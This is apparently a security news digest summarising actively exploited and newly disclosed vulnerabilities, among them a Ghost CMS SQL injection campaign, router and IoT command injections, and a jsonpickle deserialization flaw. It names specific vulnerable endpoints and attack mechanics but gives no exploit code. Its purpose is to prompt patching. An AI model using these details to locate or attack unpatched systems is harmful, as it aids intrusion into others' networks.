What you need to know today.

Ghost CMS SQL injection under active mass exploitation — 700+ sites poisoned with ClickFix malware. CVE-2026-26980 is a critical unauthenticated SQL injection in Ghost CMS versions 3.24.0 through 6.19.0 that allows arbitrary database reads. As BleepingComputer reported, attackers are exploiting it in a large-scale campaign that has compromised over 700 websites, injecting malicious JavaScript that serves ClickFix-style social-engineering payloads. The Hacker News noted that the campaign uses the SQLi to extract admin credentials and session tokens, then uploads backdoor files to maintain persistence. Ghost released a fix in version 6.19.1, but the scale of exploitation — combined with the availability of public PoC code — makes this an emergency-patch situation for any instance still running an affected version. SecurityWeek and Cyber Security News also covered the campaign.

A wave of critical unauthenticated RCEs hits backup appliances, logistics software, and IoT devices. Arcserve Unified Data Protection (CVE-2025-34523) carries a CVSS 9.8 heap-based buffer overflow in its network-facing input handling — reachable without authentication and likely wormable in internal networks where UDP appliances are deployed. Dongsheng Logistics Software (CVE-2025-34163) exposes an unauthenticated file-upload endpoint at /CommMng/Print/UploadMailFile that lets attackers upload arbitrary executable scripts. On the IoT front, the WDR201A WiFi Extender (CVE-2026-41922) contains an unauthenticated OS command injection in wireless.cgi, and multiple D-Link DSL/DIR/DNS devices (CVE-2026-0625) have an authentication bypass in the dnscfg.cgi endpoint. All of these are remotely exploitable with no credentials required and should be prioritized for patching or network segmentation.

Old vulnerabilities resurface with high EPSS scores, indicating active or imminent scanning. Several CVEs from 2012–2013 are seeing renewed attention. CVE-2012-10060 (Sysax Multi Server SSH buffer overflow, CVSS 9.8, EPSS 0.69) allows pre-authentication RCE via an overly long username. CVE-2012-10047 (Cyclope Employee Surveillance SQL injection, EPSS 0.53) bypasses login entirely. CVE-2013-10068 (Foxit Reader plugin stack overflow, EPSS 0.59) triggers when a victim opens a malicious PDF. CVE-2012-10027 (WordPress WP-Property plugin unauthenticated file upload, EPSS 0.74) enables full server compromise. These are not new disclosures — they are old flaws that threat actors are rediscovering and weaponizing, likely because many organizations never patched them. The WP-Property plugin CVE is especially concerning given WordPress's massive install base and the plugin's continued use on legacy sites.

Multiple authenticated command-injection and RCE flaws in routers, management platforms, and ML tooling. CVE-2013-10050 affects D-Link DIR-300 and DIR-615 routers via the tools_vct.xgi CGI endpoint — authenticated but trivial to exploit once credentials are obtained. CVE-2020-37002 in Ajenti 2.1.36 allows post-auth RCE via the /api/terminal/create endpoint. CVE-2026-31217 in the optimate ML project (Nebuly AI) allows arbitrary code execution when loading a model from a user-supplied path. CVE-2026-22189 in Panda3D's egg-mkfont utility contains a stack buffer overflow from unbounded sprintf() calls. While these require some level of access or user interaction, their CVSS scores (8.8–9.8) reflect the full impact once triggered. The D-Link router flaws are particularly relevant for small-office environments where default credentials remain common.

Supply-chain and dependency risks: jsonpickle RCE, cors-anywhere SSRF, and an unsandboxed Lua interpreter. CVE-2021-47952 in python jsonpickle 2.0.0 allows RCE via deserialization of malicious JSON containing py/repr objects — a classic pickle-style attack that affects any application deserializing untrusted JSON with this library. CVE-2020-36851 in Rob--W cors-anywhere turns instances configured as open proxies into SSRF vectors, enabling attackers to reach internal networks. CVE-2026-22208 in OpenS100 (the S-100 maritime chart viewer) contains an unrestricted Lua interpreter that allows full RCE. These are harder to inventory but equally dangerous — security teams should audit their dependency trees for jsonpickle and cors-anywhere usage, and check for any OpenS100 deployments in maritime or geospatial contexts.

Ilevia EVE X1/X5 server and multiple Chinese healthcare/logistics systems expose critical unauthenticated flaws. CVE-2025-34186 in Ilevia EVE X1/X5 Server (≤ 4.7.18.0.eden) passes unsanitized input to a system() call during authentication, enabling unauthenticated command injection. CVE-2025-34162 in the Bian Que Feijiu Intelligent Emergency and Quality Control System (Wooluo) has an unauthenticated SQL injection in its GetLyfsByParams endpoint. CVE-2026-31216 in nexent v1.7.5.2 allows unauthenticated arbitrary file deletion via its storage API. These systems are deployed in logistics, healthcare, and building-management contexts where patching cycles are slow and network segmentation is often absent. The Ilevia flaw is especially dangerous because the command injection occurs during the authentication handshake itself — before any access control is enforced.